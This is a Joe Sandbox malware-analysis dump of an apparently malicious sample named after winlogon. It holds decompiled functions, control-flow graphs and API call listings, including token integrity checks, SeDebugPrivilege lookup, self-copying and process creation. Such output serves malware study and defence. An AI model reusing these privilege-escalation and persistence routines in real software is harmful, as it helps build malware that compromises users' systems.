    0x00d6721c
    0x00d67227
    0x00d67235
    0x00d6723f
    0x00d67244
    0x00d6724b
    0x00d6724d
    0x00d6724d
    0x00d67252
    0x00d67259
    0x00d6725b
    0x00d6725b
    0x00d67266
    0x00d6726b
    0x00d67271
    0x00d67276
    0x00d67278
    0x00d67281
    0x00d67287
    0x00d67287
    0x00d6728c
    0x00d67299
    0x00d672ad
    0x00d672b5
    0x00d672c5
    0x00d672de
    0x00d672f3
    0x00d67306
    0x00d67323
    0x00d67334
    0x00d67339
    0x00d67339
    0x00d6733b
    0x00d6734e
    0x00d67354
    0x00d67360
    0x00d6736a
    0x00d67380

    APIs
    • GetCurrentProcessId.KERNEL32(276B9783,00000000,00000000,00D7E42B,000000FF,?,invalid vector<T> subscript), ref: 00D67210
      • Part of subcall function 00D66390: InitializeCriticalSection.KERNEL32(?,00000000,00D67221,?,invalid vector<T> subscript), ref: 00D663AB
      • Part of subcall function 00D66500: WSAStartup.WS2_32(00000202,?), ref: 00D6651C
      • Part of subcall function 00D66500: GetModuleHandleA.KERNEL32(00000000,?,000003FF,?,00000000), ref: 00D6656C
      • Part of subcall function 00D66500: GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00D66573
      • Part of subcall function 00D666C0: GetFileAttributesA.KERNELBASE(?), ref: 00D666FF
      • Part of subcall function 00D666C0: GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D66735
      • Part of subcall function 00D666C0: GetModuleFileNameW.KERNEL32(00000000), ref: 00D6673C
      • Part of subcall function 00D666C0: ExitProcess.KERNEL32 ref: 00D66754
      • Part of subcall function 00D64040: GetModuleHandleA.KERNEL32(00000000,?,000003FF), ref: 00D640B4
      • Part of subcall function 00D64040: GetModuleFileNameA.KERNEL32(00000000), ref: 00D640BB
      • Part of subcall function 00D64040: CopyFileA.KERNEL32(?,?,00000000), ref: 00D640D1
      • Part of subcall function 00D64040: GetFileAttributesA.KERNELBASE(?), ref: 00D640E2
      • Part of subcall function 00D64220: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6427E
      • Part of subcall function 00D64220: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6428E
      • Part of subcall function 00D671E0: GetFileAttributesA.KERNELBASE(?,276B9783), ref: 00D66F0D
      • Part of subcall function 00D671E0: GetFileAttributesA.KERNELBASE(?), ref: 00D66F2E
      • Part of subcall function 00D671E0: InitializeCriticalSection.KERNEL32(?), ref: 00D66F75
      • Part of subcall function 00D671E0: InitializeCriticalSection.KERNEL32(?), ref: 00D66FB4
      • Part of subcall function 00D671E0: InitializeCriticalSection.KERNEL32(?), ref: 00D66FCF
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,00000000,000000FF,00000000,00000000), ref: 00D6705D
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,00000000,000000FF,00000000,00000000), ref: 00D67081
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,-00000100,000000FF,00000000,00000000), ref: 00D670C3
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D670EB
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D67178
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D6718C
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D671A9
      • Part of subcall function 00D671E0: GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D6731C
      • Part of subcall function 00D671E0: GetModuleFileNameW.KERNEL32(00000000), ref: 00D67323
      • Part of subcall function 00D671E0: WSACleanup.WS2_32 ref: 00D6733B
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D67354
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D79096, Relevance: 12.2, APIs: 8, Instructions: 216

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 484 d79096-d790af 485 d790c5-d790ca 484->485 486 d790b1-d790c1 call d7b648 484->486 488 d790d7-d790fb MultiByteToWideChar 485->488 489 d790cc-d790d4 485->489 486->485 493 d790c3 486->493 491 d79101-d7910d 488->491 492 d7928e-d792a1 call d6abe4 488->492 489->488 494 d7910f-d79120 491->494 495 d79161 491->495 493->485 499 d7913f-d79150 call d717ff 494->499 500 d79122-d79131 call d7d520 494->500 497 d79163-d79165 495->497 501 d7916b-d7917e MultiByteToWideChar 497->501 502 d79283 497->502 499->502 509 d79156 499->509 500->502 511 d79137-d7913d 500->511 501->502 507 d79184-d79196 call d74fb1 501->507 506 d79285-d7928c call d77337 502->506 506->492 514 d7919b-d7919f 507->514 513 d7915c-d7915f 509->513 511->513 513->497 514->502 516 d791a5-d791ac 514->516 517 d791e6-d791f2 516->517 518 d791ae-d791b3 516->518 519 d7923e 517->519 520 d791f4-d79205 517->520 518->506 521 d791b9-d791bb 518->521 524 d79240-d79242 519->524 522 d79207-d79216 call d7d520 520->522 523 d79220-d79231 call d717ff 520->523 521->502 525 d791c1-d791db call d74fb1 521->525 529 d7927c-d79282 call d77337 522->529 536 d79218-d7921e 522->536 523->529 538 d79233 523->538 524->529 530 d79244-d7925d call d74fb1 524->530 525->506 539 d791e1 525->539 529->502 530->529 541 d7925f-d79266 530->541 542 d79239-d7923c 536->542 538->542 539->502 543 d79268-d79269 541->543 544 d792a2-d792a8 541->544 542->524 545 d7926a-d7927a WideCharToMultiByte 543->545 544->545 545->529 546 d792aa-d792b1 call d77337 545->546 546->506
    C-Code - Quality: 69%
    			E00D79096(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xd88004; // 0x276b9783
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00D7B648(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00D6ABE4(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00D77337(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00D74FB1(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00D77337(_t101);
									goto L36;
								}
								_t62 = E00D74FB1(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00D77337(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00D717FF(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00D7D520();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00D74FB1(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00D717FF(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00D7D520();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























    0x00d7909b
    0x00d7909c
    0x00d7909d
    0x00d790a4
    0x00d790a8
    0x00d790a9
    0x00d790af
    0x00d790b5
    0x00d790bb
    0x00d790be
    0x00d790be
    0x00d790c1
    0x00d790c3
    0x00d790c3
    0x00d790c1
    0x00d790c5
    0x00d790ca
    0x00d790d1
    0x00d790d4
    0x00d790d4
    0x00d790f0
    0x00d790f6
    0x00d790fb
    0x00d7928e
    0x00d792a1
    0x00d79101
    0x00d79101
    0x00d79104
    0x00d79109
    0x00d7910d
    0x00d79161
    0x00d79161
    0x00d79163
    0x00d79165
    0x00d79283
    0x00d79283
    0x00d79285
    0x00d79286
    0x00000000
    0x00d7928c
    0x00d79176
    0x00d7917c
    0x00d7917e
    0x00000000
    0x00000000
    0x00d79184
    0x00d79196
    0x00d7919b
    0x00d7919f
    0x00000000
    0x00000000
    0x00d791ac
    0x00d791e6
    0x00d791e9
    0x00d791ec
    0x00d791ee
    0x00d791f0
    0x00d791f2
    0x00d7923e
    0x00d7923e
    0x00d79240
    0x00d79240
    0x00d79242
    0x00d7927c
    0x00d7927d
    0x00000000
    0x00d79282
    0x00d79256
    0x00d7925b
    0x00d7925d
    0x00000000
    0x00000000
    0x00d79261
    0x00d79262
    0x00d79263
    0x00d79266
    0x00d792a2
    0x00d792a5
    0x00d79268
    0x00d79268
    0x00d79269
    0x00d79269
    0x00d79276
    0x00d79278
    0x00d7927a
    0x00d792ab
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d7927a
    0x00d791f4
    0x00d791f7
    0x00d791f9
    0x00d791fb
    0x00d791fd
    0x00d79200
    0x00d79205
    0x00d79220
    0x00d79222
    0x00d7922c
    0x00d7922e
    0x00d7922f
    0x00d79231
    0x00000000
    0x00000000
    0x00d79233
    0x00d79239
    0x00d79239
    0x00000000
    0x00d79239
    0x00d79207
    0x00d79209
    0x00d7920d
    0x00d79212
    0x00d79214
    0x00d79216
    0x00000000
    0x00000000
    0x00d79218
    0x00000000
    0x00d79218
    0x00d791ae
    0x00d791b3
    0x00000000
    0x00000000
    0x00d791b9
    0x00d791bb
    0x00000000
    0x00000000
    0x00d791d2
    0x00d791d7
    0x00d791db
    0x00000000
    0x00000000
    0x00000000
    0x00d791e1
    0x00d79114
    0x00d79116
    0x00d79118
    0x00d79120
    0x00d7913f
    0x00d79141
    0x00d7914b
    0x00d7914d
    0x00d7914e
    0x00d79150
    0x00000000
    0x00000000
    0x00d79156
    0x00d7915c
    0x00d7915c
    0x00000000
    0x00d7915c
    0x00d79124
    0x00d79128
    0x00d7912d
    0x00d79131
    0x00000000
    0x00000000
    0x00d79137
    0x00000000
    0x00d79137

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D6FADD,00D6FADD,?,?,?,00D792E7,00000001,00000001,27E85006), ref: 00D790F0
    • __alloca_probe_16.NTDLLP ref: 00D79128
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D792E7,00000001,00000001,27E85006,?,?,?), ref: 00D79176
      • Part of subcall function 00D74FB1: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,27E85006,00000001,?,?), ref: 00D75022
    • __alloca_probe_16.NTDLLP ref: 00D7920D
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,27E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D79270
    • __freea.LIBCMT ref: 00D7927D
    • __freea.LIBCMT ref: 00D79286
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • __freea.LIBCMT ref: 00D792AB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62820, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 549 d62820-d6282c 550 d62842 549->550 551 d6282e-d62834 549->551 552 d62844-d62857 call d61a30 550->552 551->550 553 d62836-d62839 551->553 557 d62861-d6287b 552->557 558 d62859-d62860 552->558 553->550 555 d6283b-d62840 553->555 555->552 557->558 560 d6287d-d62882 557->560 560->558 561 d62884-d62892 call d702c9 560->561 564 d6289b-d628a5 561->564 565 d62894-d6289a 561->565 566 d628ac-d628ae 564->566 567 d628b0-d628ba IsValidSid 566->567 568 d628f1 566->568 567->568 569 d628bc-d628c8 GetLengthSid 567->569 570 d628f3-d628f6 568->570 569->568 571 d628ca-d628d7 call d702c9 569->571 572 d628f8-d628fe 570->572 573 d62909-d62911 570->573 571->568 578 d628d9-d628e5 CopySid 571->578 572->573 575 d62900-d62906 call d7009a 572->575 575->573 580 d62912-d62917 578->580 581 d628e7-d628ee call d7009a 578->581 580->570 581->568
    C-Code - Quality: 75%
    			E00D62820(void* __ecx, void** __edx) {
				long _v8;
				union _TOKEN_INFORMATION_CLASS _t6;
				void* _t7;
				int _t9;
				long _t11;
				void* _t12;
				int _t14;
				void* _t19;
				void** _t23;
				union _TOKEN_INFORMATION_CLASS _t25;
				void* _t31;
				long _t34;
				void* _t37;
				void* _t40;
				void* _t41;
				void* _t42;

				_t28 = __ecx;
				_push(__ecx);
				_t31 = __ecx;
				_t23 = __edx;
				if(__ecx == 0 || __ecx == 0xcccccccc || __ecx == 0xffffffff) {
					_t6 = 0;
				} else {
					_t6 = 1;
				}
				_push(0xdeefbad7);
				_push(_t23);
				_t7 = E00D61A30(0, _t6);
				_t41 = _t40 + 0x10;
				if(_t7 != 0) {
					_v8 = 0;
					_t9 = GetTokenInformation(_t31, 1, 0, 0,  &_v8); // executed
					if(_t9 != 0) {
						goto L6;
					} else {
						_t11 = _v8;
						if(_t11 == 0) {
							goto L6;
						} else {
							_push(_t11);
							_t12 = E00D702C9(_t28);
							_t37 = _t12;
							_t42 = _t41 + 4;
							if(_t37 != 0) {
								_t14 = GetTokenInformation(_t31, 1, _t37, _v8,  &_v8); // executed
								if(_t14 == 0 || IsValidSid( *_t37) == 0) {
									L17:
									_t25 = 0;
								} else {
									_t34 = GetLengthSid( *_t37);
									if(_t34 == 0) {
										goto L17;
									} else {
										_push(_t34);
										_t19 = E00D702C9(_t28);
										_t42 = _t42 + 4;
										 *_t23 = _t19;
										if(_t19 == 0) {
											goto L17;
										} else {
											if(CopySid(_t34, _t19,  *_t37) != 0) {
												_t25 = 1;
											} else {
												E00D7009A( *_t23);
												_t42 = _t42 + 4;
												goto L17;
											}
										}
									}
								}
								if(_t37 != 0xffffffff && _t37 != 0xcccccccc) {
									E00D7009A(_t37);
								}
								return _t25;
							} else {
								return _t12;
							}
						}
					}
				} else {
					L6:
					return 0;
				}
			}



















    0x00d62820
    0x00d62823
    0x00d62826
    0x00d62828
    0x00d6282c
    0x00d62842
    0x00d6283b
    0x00d6283b
    0x00d6283b
    0x00d62844
    0x00d62849
    0x00d6284d
    0x00d62852
    0x00d62857
    0x00d62864
    0x00d62873
    0x00d6287b
    0x00000000
    0x00d6287d
    0x00d6287d
    0x00d62882
    0x00000000
    0x00d62884
    0x00d62885
    0x00d62886
    0x00d6288b
    0x00d6288d
    0x00d62892
    0x00d628a6
    0x00d628ae
    0x00d628f1
    0x00d628f1
    0x00d628bc
    0x00d628c4
    0x00d628c8
    0x00000000
    0x00d628ca
    0x00d628ca
    0x00d628cb
    0x00d628d0
    0x00d628d3
    0x00d628d7
    0x00000000
    0x00d628d9
    0x00d628e5
    0x00d62912
    0x00d628e7
    0x00d628e9
    0x00d628ee
    0x00000000
    0x00d628ee
    0x00d628e5
    0x00d628d7
    0x00d628c8
    0x00d628f6
    0x00d62901
    0x00d62906
    0x00d62911
    0x00d62894
    0x00d6289a
    0x00d6289a
    0x00d62892
    0x00d62882
    0x00d62859
    0x00d62859
    0x00d62860
    0x00d62860

    APIs
    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62873
    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?), ref: 00D628A6
    • IsValidSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628B2
    • GetLengthSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628BE
    • CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62D30, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 597 d62d30-d62d58 call d61a30 600 d62d6b-d62d96 GetCurrentProcess call d61a30 597->600 601 d62d5a-d62d6a call d6abe4 597->601 600->601 606 d62d98-d62daa OpenProcessToken 600->606 606->601 607 d62dac-d62db4 606->607 607->601 608 d62db6-d62dc6 call d62820 607->608 610 d62dcb-d62dcd 608->610 610->601 611 d62dcf-d62e01 call d6d520 call d62650 610->611 616 d62e19-d62e1b 611->616 617 d62e03-d62e06 611->617 618 d62e2f-d62e38 616->618 619 d62e1d-d62e2e call d6abe4 616->619 617->616 620 d62e08-d62e0e 617->620 623 d62e40-d62e49 618->623 620->616 622 d62e10-d62e16 call d7009a 620->622 622->616 623->623 625 d62e4b-d62e58 623->625 628 d62e60-d62e69 625->628 628->628 629 d62e6b-d62eac call d68b60 call d6abe4 628->629
    C-Code - Quality: 79%
    			E00D62D30(WCHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v532;
				char _v1052;
				void* _v1056;
				signed int _v1060;
				signed int _t21;
				void* _t23;
				signed int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				WCHAR* _t37;
				signed int _t49;
				intOrPtr* _t50;
				signed int _t51;
				signed int _t52;
				void* _t60;
				void* _t63;
				intOrPtr* _t64;
				WCHAR** _t69;
				signed int _t71;
				void* _t72;
				signed int _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_t21 =  *0xd88004; // 0x276b9783
				_v8 = _t21 ^ _t75;
				_t69 = __ecx;
				_push(0xdeefbad7);
				_t23 = E00D61A30(0, __ecx);
				_t77 = _t76 + 0xc;
				if(_t23 != 0) {
					_v1056 = 0xffffffff;
					_t60 = GetCurrentProcess();
					_push(0xdeefbad7);
					_push( &_v1056);
					_t26 = E00D61A30(0, _t60);
					_t78 = _t77 + 0x10;
					__eflags = _t26;
					if(_t26 == 0) {
						goto L1;
					} else {
						_t30 = OpenProcessToken(_t60, 8,  &_v1056);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L1;
						} else {
							_t47 = _v1056;
							__eflags = _v1056;
							if(_v1056 == 0) {
								goto L1;
							} else {
								_v1060 = 0;
								_t31 = E00D62820(_t47,  &_v1060); // executed
								__eflags = _t31;
								if(_t31 == 0) {
									goto L1;
								} else {
									E00D6D520(_t69,  &_v1052, 0, 0x414);
									_t79 = _t78 + 0xc;
									_t34 = E00D62650(_v1060,  &_v1052, __eflags);
									_t49 = _v1060;
									_t71 = _t34;
									__eflags = _t49;
									if(_t49 != 0) {
										__eflags = _t49 - 0xffffffff;
										if(_t49 != 0xffffffff) {
											__eflags = _t49 - 0xcccccccc;
											if(_t49 != 0xcccccccc) {
												E00D7009A(_t49);
												_t79 = _t79 + 4;
											}
										}
									}
									__eflags = _t71;
									if(_t71 != 0) {
										_t50 =  &_v1052;
										_t63 = _t50 + 2;
										do {
											_t35 =  *_t50;
											_t50 = _t50 + 2;
											__eflags = _t35;
										} while (_t35 != 0);
										_t51 = _t50 - _t63;
										__eflags = _t51;
										_t64 =  &_v532;
										_t52 = _t51 >> 1;
										_t72 = _t64 + 2;
										do {
											_t36 =  *_t64;
											_t64 = _t64 + 2;
											__eflags = _t36;
										} while (__eflags != 0);
										_t37 = E00D68B60(_t52 + (_t64 - _t72 >> 1) + 0x10, __eflags);
										 *_t69 = _t37;
										wsprintfW(_t37, L"%ls\\%ls",  &_v532,  &_v1052);
										__eflags = _v8 ^ _t75;
										return E00D6ABE4(_v8 ^ _t75);
									} else {
										__eflags = _v8 ^ _t75;
										return E00D6ABE4(_v8 ^ _t75);
									}
								}
							}
						}
					}
				} else {
					L1:
					return E00D6ABE4(_v8 ^ _t75);
				}
			}
































    0x00d62d39
    0x00d62d40
    0x00d62d44
    0x00d62d46
    0x00d62d4e
    0x00d62d53
    0x00d62d58
    0x00d62d6b
    0x00d62d7b
    0x00d62d83
    0x00d62d88
    0x00d62d8c
    0x00d62d91
    0x00d62d94
    0x00d62d96
    0x00000000
    0x00d62d98
    0x00d62da2
    0x00d62da8
    0x00d62daa
    0x00000000
    0x00d62dac
    0x00d62dac
    0x00d62db2
    0x00d62db4
    0x00000000
    0x00d62db6
    0x00d62dbc
    0x00d62dc6
    0x00d62dcb
    0x00d62dcd
    0x00000000
    0x00d62dcf
    0x00d62dde
    0x00d62def
    0x00d62df2
    0x00d62df7
    0x00d62dfd
    0x00d62dff
    0x00d62e01
    0x00d62e03
    0x00d62e06
    0x00d62e08
    0x00d62e0e
    0x00d62e11
    0x00d62e16
    0x00d62e16
    0x00d62e0e
    0x00d62e06
    0x00d62e19
    0x00d62e1b
    0x00d62e2f
    0x00d62e35
    0x00d62e40
    0x00d62e40
    0x00d62e43
    0x00d62e46
    0x00d62e46
    0x00d62e4b
    0x00d62e4b
    0x00d62e4d
    0x00d62e53
    0x00d62e55
    0x00d62e60
    0x00d62e60
    0x00d62e63
    0x00d62e66
    0x00d62e66
    0x00d62e74
    0x00d62e7f
    0x00d62e8f
    0x00d62e9b
    0x00d62eac
    0x00d62e1d
    0x00d62e24
    0x00d62e2e
    0x00d62e2e
    0x00d62e1b
    0x00d62dcd
    0x00d62db4
    0x00d62daa
    0x00d62d5a
    0x00d62d5a
    0x00d62d6a
    0x00d62d6a

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetCurrentProcess.KERNEL32 ref: 00D62D75
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62DA2
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62873
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?), ref: 00D628A6
      • Part of subcall function 00D62820: IsValidSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628B2
      • Part of subcall function 00D62820: GetLengthSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628BE
      • Part of subcall function 00D62820: CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
      • Part of subcall function 00D62650: LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    • wsprintfW.USER32 ref: 00D62E8F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62A60, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 635 d62a60-d62a6b 636 d62a6d-d62a73 635->636 637 d62a81 635->637 636->637 639 d62a75-d62a78 636->639 638 d62a83-d62a9d call d61a30 637->638 643 d62a9f-d62aa5 638->643 644 d62aa6-d62ac7 LookupPrivilegeValueW 638->644 639->637 640 d62a7a-d62a7f 639->640 640->638 644->643 645 d62ac9-d62ae3 644->645 645->643 647 d62ae5-d62aea 645->647 647->643 648 d62aec-d62afa call d702c9 647->648 651 d62afc-d62b01 648->651 652 d62b02-d62b0f 648->652 653 d62b16-d62b18 652->653 654 d62b66-d62b69 653->654 655 d62b1a-d62b29 653->655 656 d62b6b-d62b71 654->656 657 d62b7c-d62b84 654->657 658 d62b61 655->658 659 d62b2b-d62b2e 655->659 656->657 660 d62b73-d62b79 call d7009a 656->660 658->654 661 d62b30-d62b37 659->661 660->657 663 d62b44-d62b4a 661->663 664 d62b39-d62b42 661->664 663->661 666 d62b4c 663->666 664->663 667 d62b4e-d62b5f 664->667 666->658 667->658
    C-Code - Quality: 82%
    			E00D62A60(void* __ecx, void** _a4) {
				long _v8;
				struct _LUID _v16;
				signed int _t25;
				int _t31;
				long _t32;
				void* _t33;
				int _t35;
				signed int _t47;
				void** _t49;
				signed int _t51;
				intOrPtr* _t52;
				void* _t53;
				void _t54;
				void* _t56;

				_t50 = __ecx;
				_t53 = __ecx;
				if(__ecx == 0 || __ecx == 0xcccccccc || __ecx == 0xffffffff) {
					_t25 = 0;
				} else {
					_t25 = 1;
				}
				_push(0xdeefbad7);
				_push(_a4);
				_push(L"SeDebugPrivilege");
				if(E00D61A30(0, _t25) != 0) {
					_v16.LowPart = 0;
					_v16.HighPart = 0;
					if(LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16) == 0) {
						goto L6;
					} else {
